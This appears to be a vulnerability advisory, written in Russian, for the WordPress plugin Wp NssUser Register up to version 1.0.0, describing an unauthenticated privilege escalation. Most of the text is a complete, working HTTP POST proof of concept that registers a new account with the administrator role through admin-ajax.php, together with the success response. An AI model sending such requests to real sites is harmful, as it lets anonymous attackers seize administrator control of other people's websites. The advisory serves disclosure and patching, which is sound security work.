
Wp NssUser Register <= 1.0.0 - Неаутентифицированное повышение привилегий
Wp NssUser Register <= 1.0.0 - Неавторизованное повышение привилегий
Плагин Wp NssUser Register для WordPress уязвим к повышению привилегий во всех версиях до 1.0.0 включительно. Это позволяет неавторизованным атакующим регистрироваться на сайте в качестве администраторов.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Referer: http://example.com/
action=nssTheme_registration_form&rgName=admin2&[email protected]&rgFname=Attacker&rgLname=User&rgRole=administrator&rg_pass=evilpass
<p>successful, just Check this: </p> <a href="https://wp-dev.ddev.site/wp-login.php" title="Login">Login</a>